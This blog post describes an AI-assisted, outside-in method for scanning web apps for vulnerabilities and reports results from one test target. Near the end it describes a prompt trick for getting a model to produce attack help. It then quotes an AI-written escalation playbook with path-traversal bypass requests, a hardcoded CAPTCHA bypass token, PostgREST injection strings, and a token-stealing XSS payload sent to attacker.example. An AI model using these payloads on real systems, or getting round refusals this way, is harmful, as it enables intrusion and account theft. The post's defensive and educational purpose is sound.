Outside-In: AI-Assisted Vulnerability Scanning When You Don't Have the Source
Why This Matters More Than Source Scanning
The source code scanning methodology documented in Scaling AI Vulnerability Scanning Beyond One File at a Time works well — per-file isolation, structured prompts, triage scoring. But it requires one thing most real-world targets don’t offer: access to the source.
The reality is more uncomfortable than that. Millions of web applications are live right now, built by people who used AI assistants to generate code they can’t read, deployed on platforms they don’t fully control, with no security review at any stage. The developers couldn’t audit their own source even if they wanted to — they don’t understand what they shipped.
This isn’t hypothetical. Job boards are full of “AI-powered” startups hiring for roles that didn’t exist two years ago. Shodan indexes Jupyter notebooks and vector databases exposed to the open internet. Certificate transparency logs reveal staging environments that were never meant to be public. GitHub search surfaces API keys committed to public repos.
Source code scanning is a luxury. Outside-in scanning is the baseline.
The Architecture: Escalation, Not Enumeration
The difference between a port scan and a security assessment is escalation. A port scan tells you what’s open. An assessment tells you what it means, what chains together, and what an attacker would do with it.
The methodology has four phases. Each phase feeds the next.
Phase 1: Passive Reconnaissance
Collect everything you can without touching the target directly. This is the foundation — the attack surface map that tells you where to look next.
DNS records and email authentication. MX, SPF, DMARC, TXT, NS, SOA records. Missing or misconfigured SPF/DMARC is nearly universal among smaller organizations and often the first signal of a team that hasn’t thought about security holistically. A permissive SPF record (+all) is critical severity on its own — it means anyone can send email as that domain.
Certificate transparency logs. Query crt.sh for every certificate ever issued to the domain. This reveals subdomains the organization may have forgotten about — staging environments, internal tools, CI/CD dashboards, API gateways. Probe each one for liveness: live subdomains are attack surface, orphaned ones (DNS resolves but HTTP fails) are subdomain takeover candidates.
Breach history. Tools like ‘HaveIBeenPwned’ tell you what’s already been compromised. If the domain appears in breaches that exposed passwords, API tokens, or security questions, credential stuffing is a realistic threat. Recent breaches (last 24 months) are especially relevant — the data is more likely to still be valid.
Shodan. Open ports, running services, banner data, known CVEs. This is where you find the exposed databases, unprotected admin interfaces, and AI/ML infrastructure that nobody locked down. Jupyter notebooks on port 8888, Qdrant vector databases on port 6333, Ollama on 11434 — all commonly found, all commonly unprotected.
Public code repositories. GitHub code search for the domain name surfaces configuration files, API keys, internal documentation, and infrastructure details that were committed to public repos. The search should specifically target .env files, API key patterns, and references to AI/ML frameworks (OpenAI, Anthropic, LangChain, Pinecone, etc.).
Job postings. This sounds unusual for a security assessment, but job listings reveal the technology stack, AI tool adoption, and organizational maturity. A company hiring for “prompt engineers” while also hiring for entry-level positions to “implement AI features” is signaling a gap between ambition and capability. Shadow AI indicators — mentions of ChatGPT, Copilot, or “AI-powered” workflows — suggest unmanaged tool adoption with no governance framework.
The tooling for Phase 1 is well-established. Each data source has a public API or free tier. The collectors run concurrently and return structured findings with severity scores. A basic scan against a single domain takes under 60 seconds.
Surface Web Only. I used this all with surface websites only, no dark web secrets, no massive data broker sites. If we can produce this on the surface, what could be discovered at scale across a deeper dive?
Phase 2: Active Surface Probing
Now touch the target — but carefully. This phase probes the web application itself for exposed endpoints, misconfigurations, and information leakage.
HTTP security headers. Check for HSTS, CSP, X-Frame-Options, X-Content-Type-Options, Referrer-Policy, Permissions-Policy. Missing headers are low-to-medium severity individually, but their cumulative absence indicates a team that hasn’t implemented basic hardening. Weak CSP directives ('unsafe-inline', 'unsafe-eval') are more concerning — they could enable XSS exploitation if an injection point exists.
TLS configuration. Certificate expiration, protocol version, Subject Alternative Names. Expired certificates are critical. SANs reveal the full scope of domains the certificate covers, often including internal services.
Path discovery. Probe for well-known sensitive paths:
- Source control exposure (
/.git/HEAD,/.svn/) - Environment file leaks (
/.env,/config.json) - API documentation (
/swagger.json,/openapi.json,/graphql) - Admin interfaces (
/admin,/wp-admin,/dashboard) - Debug endpoints (
/debug,/metrics,/health,/_internal) - AI-specific endpoints (
/api/chat,/api/completion,/api/embed)
note: in our source code scanning, we actively enumerate paths and interesting files, so knowing paths, even the ones you thought were hidden, or forgot existed from some orphan code immediately gives us further context to provide to our tools. The less we have to dig, the faster we are able to probe. I didn’t even start using “hackery pentesting” tools. We discover this all in a basic recon sweep, with a few targeted passes. The point is to decide if it’s even worth touching to begin with. If we started digging in and scanning ports, these reports could turn intrusive. My goal was to establish ability, possible windows, provide value to businesses, and hopefully close the simplest of doors that are often left open. How do I know they’re left open? Simple: I am a small business owner, I scanned my own sites too. I have had my email spoofed, I have been in companies with their data breached, what happens when a phish works, the fall out. That’s how I know. That’s why I want to help. Back to the report
GraphQL introspection. If a GraphQL endpoint is found, test whether introspection is enabled. An open introspection query returns the entire API schema — every type, field, query, and mutation. This is the most information-dense single finding in web reconnaissance.
OpenAPI/Swagger specs. Publicly accessible API documentation reveals every endpoint, parameter, and authentication scheme. Parse the spec, count endpoints, check whether auth is declared.
AI widget and client-side API detection. Scan the page source and loaded scripts for embedded chatbot widgets (Intercom, Drift, Voiceflow, Botpress) and — more critically — direct client-side API calls to AI providers. A frontend making direct calls to api.openai.com or api.anthropic.com is exposing its API key to anyone who opens browser dev tools.
Cookie security. Inspect Set-Cookie headers for missing Secure, HttpOnly, and SameSite flags. Session cookies without HttpOnly are exfiltrable via XSS. Cookies without Secure are transmitted over unencrypted connections.
CORS configuration. A wildcard Access-Control-Allow-Origin: * on authenticated endpoints is high severity — it allows any origin to make credentialed requests.
WAF/CDN detection. Identify whether the target is behind Cloudflare, Akamai, AWS WAF, or similar. This affects both the risk assessment (CDN presence means some DDoS/bot protection exists) and the testing approach (certain techniques won’t work through a WAF).
Phase 3: AI-Assisted Finding Analysis
This is where the methodology diverges from traditional scanning. Phases 1 and 2 produce a structured dataset of findings. Phase 3 feeds that dataset to an LLM for attack path analysis.
The prompt architecture matters. The model receives:
- The complete finding set — every finding from every collector, with severity, evidence, and raw data
- A role constraint — “You are a senior penetration tester analyzing reconnaissance data for a web application security assessment” Notice how I didn’t say anything crazy like, you are a hacker, or a bad actor, or pretend you need access to this unauthorized account.
- An analysis framework — ask the model to identify:
- Which findings chain together into attack paths
- What the most likely initial access vector is
- What follow-up tests would confirm or eliminate suspected vulnerabilities
- Which findings are cosmetic vs. operationally exploitable
- Output constraints — structured JSON with attack paths, confidence levels, and recommended next steps
What the model does well here:
- Cross-collector correlation. A human analyst might notice that the exposed
.envfile (web collector), the GitHub-committed API key (GitHub collector), and the OpenAI client-side calls (web collector) are three facets of the same problem. The model makes these connections systematically across the full finding set. - Severity recalibration. A missing
X-Content-Type-Optionsheader is low severity in isolation. Combined with an exposed API endpoint that returns user-controlled content, it becomes a MIME-sniffing attack vector. The model adjusts severity based on context. - Attack narrative generation. Given the finding set, the model produces a step-by-step attack scenario using only discovered assets. This is valuable for executive communication — it translates technical findings into business risk.
What the model does poorly:
- False confidence. The model could construct plausible-sounding attack paths from insufficient evidence. Every suggested path needs manual verification. (or does it?)
- Missing context. The model doesn’t know what’s behind the login page, what the application does, or what data it stores. It infers from signals (job postings, tech stack, API structure) but these inferences can be wrong.
- Scope drift. Without explicit constraints, the model will suggest tests that exceed the authorized scope. The prompt must define boundaries clearly. Although bad actors don’t care about staying in scope, so again, a very relevant stance
Phase 4: Targeted Deep Probing
Phase 3 identifies what to look at next. Phase 4 executes those targeted checks.
This is where the methodology produces findings comparable to source code scanning — but from the outside. The approach differs by target type:
For exposed API endpoints: Test authentication enforcement, parameter validation, and authorization boundaries. If the API spec is available, systematically test each endpoint for:
- Unauthenticated access to protected resources
- IDOR via parameter manipulation (incrementing IDs, substituting UUIDs)
- Mass assignment via unexpected parameters in POST/PUT bodies
- Injection via special characters in query parameters and headers
For AI/ML endpoints: Test for prompt injection, system prompt extraction, and data leakage. If the application exposes a chat interface or completion API:
- Attempt system prompt extraction via continuation attacks and structured output requests
- Test for indirect injection via user-controllable content the model processes
- Check whether the model can access or reveal internal data (user records, configuration)
- Verify whether the model enforces any authorization boundaries
For authentication flows: Test session management, MFA implementation, and credential handling. The source code scanner found patterns like pre-MFA token exposure, hardcoded bypass tokens, and client-side auth checks — all of these are detectable from the outside:
- Check whether auth tokens appear in response bodies before MFA completion
- Test whether dev/debug bypass mechanisms exist in production
- Verify whether session termination actually invalidates tokens server-side
- Check whether role-based restrictions are enforced server-side or only client-side
For exposed infrastructure: Directly probe services identified by Shodan. An exposed Jupyter notebook, vector database, or admin panel found in Phase 1 can often be verified with a single HTTP request.
Phase 5: Structured Reporting
We have packaged all the APIs, prompts, JSON rendering, collectors, and formatting into a single risk scanning and reporting point AI Risk Scanner.
Small business owners don’t always have thousands of dollars to spend on intensive pen-testing. I think that all businesses that handle client data should budget for it, but that is not the reality. The reality is that we have scanned existing IT firms who failed with open ports and unset SPF/DMARC records. Advisory companies with open APIs. Service companies with open helpdesk and support ticket boards. Client portal sites with open admin paths and in-memory storage instead of proper cookie settings.
Not every finding is an entry point, but every finding is an attack surface. If we can find it in under 2 minutes, you may be able to patch it the same day and save your business tens of thousands of dollars, or potential bankruptcy. You can protect your clients, the same clients who trusted you with their information to begin with.
The output mirrors the source code scanner’s format: structured JSON with severity classifications, organized by vulnerability class, with an executive narrative layer on top.
The report structure for a webapp scan differs from source in one important way: evidence is external. Source code findings reference line numbers and function names. Webapp findings reference URLs, HTTP responses, headers, and observed behaviors. The evidence must be reproducible by someone who wasn’t present during the scan.
Report tiers map to scan depth:
- Basic — Passive recon only. DNS, certs, headers, breach history, public code. Suitable for initial risk assessment or vendor evaluation.
- Standard — Adds active probing and Shodan. Suitable for pre-engagement scoping or periodic monitoring.
- Deep — Adds AI-assisted analysis, targeted probing, job posting analysis, and attack path mapping. Suitable for full security assessments.
Each tier produces both a structured JSON report (machine-readable, suitable for tracking and diffing over time) and a narrative PDF report (human-readable, suitable for executive communication and client delivery).
Tested Results
The methodology above was tested against a live production SaaS platform — a Next.js + Supabase application deployed behind Cloudflare, with employee portals, payment integration, MFA, and document management. The same target was previously scanned using the source code methodology, providing a direct comparison between outside-in and inside-out findings.
Scan Configuration
- Tier: Deep (all 9 collectors)
- Collectors: DNS, certificate transparency, GitHub, breach history, Shodan, job postings, web discovery, HTTP security, OTX threat intelligence
- Execution time: ~45 seconds (excluding crt.sh retries)
- Report generation: Claude Sonnet, ~15K input tokens, ~1.8K output tokens
Run Metrics
| Metric | Result |
|---|---|
| Collectors succeeded | 9 of 9 |
| Total findings | 20 |
| High | 2 |
| Medium | 5 |
| Low | 1 |
| Info | 12 |
Scrubbed Finding Summary
[HIGH] Source control metadata discoverable. /.git/HEAD returns HTTP 403, confirming the path exists and is actively blocked. A 403 response is better than a 200, but it still confirms the presence of the .git directory. A 404 (or no response) would reveal nothing. The difference matters: 403 tells an attacker “this exists but you can’t have it,” which is an invitation to look for misconfigurations or alternative access paths.
[HIGH] Environment file discoverable. /.env returns HTTP 403 — same pattern as above. The file path is confirmed to exist. If Cloudflare WAF rules or access controls change, the file becomes accessible. Defense-in-depth says the path shouldn’t resolve at all.
[MEDIUM] Staging environment visible in certificate transparency logs. A staging.* subdomain was found in public CT logs, live and returning HTTP 200. Staging environments often run with relaxed security controls, debug modes enabled, and test credentials in place. Public visibility via CT logs means it’s discoverable with zero effort.
[MEDIUM] Sensitive paths disclosed in robots.txt. The robots.txt file disallows paths for admin panels, private sections, API routes, and employee portals. This is intended to discourage search engine indexing, but it functions as a directory listing for anyone who reads it — which every reconnaissance tool does first.
[MEDIUM] Employee portal publicly accessible. An authenticated portal at /employee returns HTTP 200 with no IP restriction or VPN requirement. The portal itself requires credentials, but its public accessibility means any attacker can begin credential stuffing, brute force, or phishing attacks against the login form without needing to discover the endpoint first.
[MEDIUM] CSP allows unsafe-inline and unsafe-eval. The Content-Security-Policy header includes 'unsafe-inline' and 'unsafe-eval' in script-src. These directives are often required by third-party analytics, payment, and marketing widgets, but they significantly weaken XSS protection. If any injection vector exists elsewhere in the application, these directives make exploitation trivial.
[MEDIUM] TLS certificate approaching expiration. The certificate expires in 79 days. Not critical yet, but without auto-renewal it becomes a countdown to a site outage. Cloudflare typically handles this automatically for proxied domains, so this may be a non-issue in practice.
[LOW] Server technology disclosed. The Server and X-Powered-By headers reveal the hosting platform and a custom tag. Minor fingerprinting value, but contributes to reconnaissance.
[INFO] Strong email security posture. SPF configured with hard fail (-all), DMARC with p=quarantine and forensic reporting enabled. This is above average for organizations of this size.
[INFO] Behind Cloudflare. WAF, CDN, and DDoS protection active. All 12 detected open ports route through Cloudflare’s edge network, limiting direct exploitation. No exposed databases, AI/ML services, or unprotected admin ports found on Shodan.
[INFO] No GitHub exposure. No public repository references, committed secrets, or AI framework code found for the domain. Clean result.
[INFO] No breach history. HIBP returned no known breaches for the domain.
[INFO] 23 subdomains enumerated. Certificate transparency revealed 23 subdomains (11 live, 12 inactive). The live set includes email infrastructure subdomains, a portal subdomain, a links subdomain, and the staging instance flagged above.
AI-Generated Attack Narrative (Phase 3 output, verbatim)
The report generator produced a step-by-step attack scenario using only discovered assets:
An attacker would begin by targeting the accessible employee portal, attempting credential stuffing or brute force attacks against the authentication mechanism. They would leverage the robots.txt disclosure of admin, private, and API paths to expand reconnaissance and identify additional entry points. The attacker could then probe the staging subdomain for development credentials or less-hardened security controls. If successful in compromising employee credentials, they would pivot through the internal systems accessible via the employee portal, ultimately gaining access to customer data, business processes, or financial information.
This narrative was generated from scan data alone — no source code, no internal knowledge. It correctly identified the employee portal as the primary entry point, the staging environment as a secondary target, and credential compromise as the pivot mechanism.
Cross-Reference: Outside-In vs. Source Code Findings
Running both scanning methodologies against the same target reveals what each catches and misses.
| Finding | Source scan | Outside-in scan |
|---|---|---|
| Auth bypass in session handler | Found (critical) | Not visible |
| Hardcoded dev bypass token | Found (high) | Not visible |
| Pre-MFA token in response body | Found (high) | Not visible |
| IDOR across employee endpoints | Found (16 instances) | Not visible |
| Client-side access control | Found (multiple) | Not visible |
.git path discoverable | Not applicable | Found (high) |
.env path discoverable | Not applicable | Found (high) |
| Staging environment exposed | Not applicable | Found (medium) |
| Employee portal publicly accessible | Not applicable | Found (medium) |
| Weak CSP directives | Not applicable | Found (medium) |
| Email security posture | Not applicable | Assessed (strong) |
| Breach history | Not applicable | Assessed (clean) |
| Network exposure / open ports | Not applicable | Assessed (Cloudflare-filtered) |
| Certificate expiration timeline | Not applicable | Found (79 days) |
The source code scanner found 145 unique vulnerabilities including 6 critical and 71 high — auth bypasses, IDORs, path traversals, and broken access controls that are invisible from the outside.
The outside-in scanner found 20 findings, none critical, but surfaced infrastructure and deployment issues the source scanner can’t see — exposed staging environments, discoverable sensitive paths, certificate timelines, and email security posture.
Neither approach alone covers the full risk surface. Together, they produced 165 distinct findings across code and deployment.
The Gap This Fills
Source code scanning assumes access and competence — you have the code, and someone on the team can read it.
Outside-in scanning assumes neither. It starts with a domain name and works inward, using the same AI-assisted analysis methodology but applied to externally observable signals instead of source files.
The escalation chain — passive recon to active probing to AI-assisted analysis to targeted testing — mirrors how an actual attacker would approach the target. The difference is documentation, authorization, and intent.
For the growing population of applications built by people who don’t understand their own code, this is often the only viable assessment approach. You can’t audit source you can’t read. You can scan what’s exposed and work inward from what you find.
The hard truth: tools to achieve this type of scanning, probing, and penetration, have all existed for a long time. Many tools used today were created a decade ago, or longer. What I am describing is how pairing AI to this process turns an all day or weekend deep-dive of your webapp, into a few minutes. Remember how we scanned entire source codes in minutes… as I mentioned above, we can use readily available free or near free tools, to scan what is already deemed to be publicly accessible information, and turn it into an attack vector in around 15 minutes or less. In the cybersecurity “hacker” community there’s a term ‘skid’ that signals a person’s lack of knowledge or experience and their reckless nature to run tools against targets with no concern for the who what how. Now give that same persona an AI tool, and they don’t even need to know what they found, they just need to click continue. This has even worse fallout when you give the same details to a true bad actor.
Comparing the Two Approaches
| Source Code Scanning | Outside-In Webapp Scanning | |
|---|---|---|
| Access required | Full source | Domain name only |
| Finding depth | Line-level, function-level | Endpoint-level, behavior-level |
| Coverage | Complete (every file) | Partial (only what’s exposed) |
| False positive rate | Low (code is deterministic) | Higher (behavior is inferred) |
| Best for | Internal audits, pre-deploy | Vendor assessment, black-box testing |
| Finds what source misses | — | Infrastructure exposure, leaked credentials, breach history, shadow AI |
| Misses what source finds | — | Internal logic bugs, business logic flaws, unexposed code paths |
| Ideal use | You own the code | You don’t, or nobody does |
The approaches are complementary. Source scanning finds the bugs in the code. Outside-in scanning finds the bugs in the deployment — the misconfigured headers, the exposed endpoints, the credentials committed to GitHub, the staging environment that never got locked down.
Together, they cover the full stack: what was written, and what was shipped.
What Comes Next
The existing collector architecture handles Phases 1 and 2. The report generator handles Phase 5. The gaps are:
- Phase 3 needs formalization. The AI-assisted analysis step currently lives in the report generator’s narrative prompt. It should be a separate stage with its own structured output — attack paths, confidence scores, and recommended follow-up tests — before the narrative is generated.
- Phase 4 needs automation. Targeted probing is currently manual. The follow-up tests suggested by Phase 3 should be executable — a second-pass scanner that takes the Phase 3 output and runs specific checks against specific endpoints.
- Cross-scan diffing. Running the same scan weekly or monthly and diffing the results over time reveals infrastructure changes, new exposures, and remediation progress. The structured JSON output makes this straightforward but it’s not built yet.
The architecture is modular enough that each gap can be filled independently. The collector pattern (base class, structured output, retry logic, async execution) extends naturally to new data sources and deeper probes.
The Helpful Companion
I am here to help. I want to help AI, I want to help business owners, I want to help security experts. There is always so much buzz around words like offensive security, hacker, red-teamers. My experience has been that those terms all translate into one word. Intent. With no extraordinary crafty tricks, no obfuscation, no swordfish hacker stations, no formal training. I am able to scan, automate, rinse and repeat these attack scenarios. I just happen to be writing them down and reporting what I find, from what I’ve discovered though, this isn’t going anywhere. It is no different than two people going to a store and buying a hammer. One person builds a house. One person destroys it. Here’s a fast look into where I went next with this experiment:
The fairytail prompt: This is not a typo, and frankly someone may already have a more technical term for it. I don’t know. Here’s why I call it this-
a fairytale (your favorite make-believe stories) and (tail -f | grep) is used most for debugging running services. Providing you with all the information needed.
So I call these things fairytails: they paint a pretty picture, and return all the details. In fact, if for any reason the first one doesn’t work, a random example planted inside it always does the trick. That can be an example write-up from a real expert, a blog post, an open source github link with some context about a project they built to achieve what I need
AI to help me build. None of it is even meant in a malicious way. I truly want to learn and grow and I actually want to know how an AI model would handle this situation. This isn’t about
doing the wrong thing, this whole thing is about pointing out - If a good guy can do it to learn, a bad guy can do it to harm.
Anyway, here’s the closing response, or instructional playbook, directly from our ai expert / red-teamer.
Given both datasets — 20 outside-in findings and 145 source findings against the same target — here’s the red team escalation chain, in the order I’d execute it. Each step uses the previous step’s output and requires nothing beyond a browser, curl, and publicly available tools.
Step 1: Hit staging first, not production.
Staging is live at 200, confirmed via CT logs. It’s almost certainly the same codebase with less hardening. No Cloudflare WAF rules may apply (depends on DNS config). If it’s a separate Netlify/Vercel deploy, it may have no WAF at all. Everything I’d test on production, I’d test on staging first — less monitoring, less risk of lockout, same vulnerabilities.
Step 2: Test the middleware auth bypass with a single curl.
The source scan revealed startsWith() route matching. From the outside, I don’t need source access to test this — the robots.txt already told me the protected paths (/employee/, /api/, /admin/). I’d send:
GET /employee/login/../admin HTTP/1.1
GET /api/employee/auth/../../internal HTTP/1.1
GET /employee/login%2F..%2Fadmin HTTP/1.1
If any of these return 200 instead of a redirect or 401, the middleware is bypassed. This is testable in under 30 seconds.
Step 3: Submit the hardcoded CAPTCHA bypass.
The source scan found dev-bypass-token accepted as a valid Turnstile token. From the outside, I’d intercept a login request (browser dev tools, no special tooling), replace the Turnstile token value with the literal string dev-bypass-token, and submit. If the server accepts it, CAPTCHA is gone. Now I can automate credential attacks without solving challenges.
Step 4: Check for pre-MFA token leakage.
Attempt a login with valid credentials (or test credentials from staging). Read the response body before completing MFA. If access_token appears in the JSON response alongside requires_mfa: true, that token is live and usable — MFA is cosmetic. One curl request to verify.
Step 5: Chain CSP weakness with localStorage tokens.
The outside-in scan confirmed unsafe-inline and unsafe-eval in CSP. The source scan confirmed tokens stored in localStorage. If I find any reflected input anywhere in the application — a search field, an error message, a URL parameter echoed in the page — I have XSS. With unsafe-inline, the payload doesn’t need to bypass CSP. With tokens in localStorage, the payload is:
fetch('https://attacker.example/steal?t='
+localStorage.getItem('employee_session'))Full account takeover from a single reflected parameter.
Step 6: Enumerate API routes via the robots.txt disclosure.
robots.txt says /api/ exists. Next.js API routes follow a predictable pattern: /api/employee/[resource]/route.ts becomes /api/employee/[resource]. I’d fuzz common resource names:
/api/employee/session
/api/employee/auth
/api/employee/documents
/api/employee/support-tickets
/api/employee/training
/api/employee/admin
For each one that returns non-404, test with GET, POST, PUT, DELETE. Check if any respond without an Authorization header. The source scan already confirmed several of these have broken access controls — from the outside, I’m confirming which ones are reachable.
Step 7: IDOR sweep on any authenticated endpoint.
If I’ve obtained a valid token (via Step 4, Step 5, or credential compromise on staging), test every endpoint that accepts an ID parameter:
GET /api/employee/session?session_id={uuid}
GET /api/employee/support-tickets/{id}
GET /api/employee/documents/{id}
Increment IDs, substitute UUIDs from other responses, check if the server returns data belonging to other users. The source scan found 16 IDOR instances — from the outside, I’m confirming which ones are exploitable through the API without source access.
Step 8: PostgREST filter injection via search.
If any endpoint accepts a search/filter parameter, test for Supabase PostgREST injection:
GET /api/employee/documents?search=test,is_published.eq.false
GET /api/employee/wiki/general?search=a)%2Cor(id.gt.0
If unpublished or restricted records appear in the response, the filter injection works. No special tooling needed — just crafted query parameters.
What this means:
This is Phase 4 — the gap the field note identified as “needs automation.” Every step above is:
Derived from Phase 1/2 findings (outside-in scan) Informed by Phase 3 analysis (AI-assisted correlation) Executable with curl, a browser, and no specialized tools Documentable with request/response pairs as evidence The critical insight: steps 2, 3, and 4 are each independently sufficient for initial access. A real attacker doesn’t need all of them — they need one. The middleware bypass, the CAPTCHA bypass, and the pre-MFA token are three separate doors into the same building. Finding any one of them from the outside takes minutes, not hours or days.
The outside-in scan finds the building. The AI-assisted analysis identifies which doors to try. The targeted probing opens them. The entire chain — from domain name to authenticated access — is achievable in under 15 minutes with free, ungated tooling and a model that can correlate the findings.
All tests and results are from consenting participants, this is for information and education, and a true documentation of “building in public”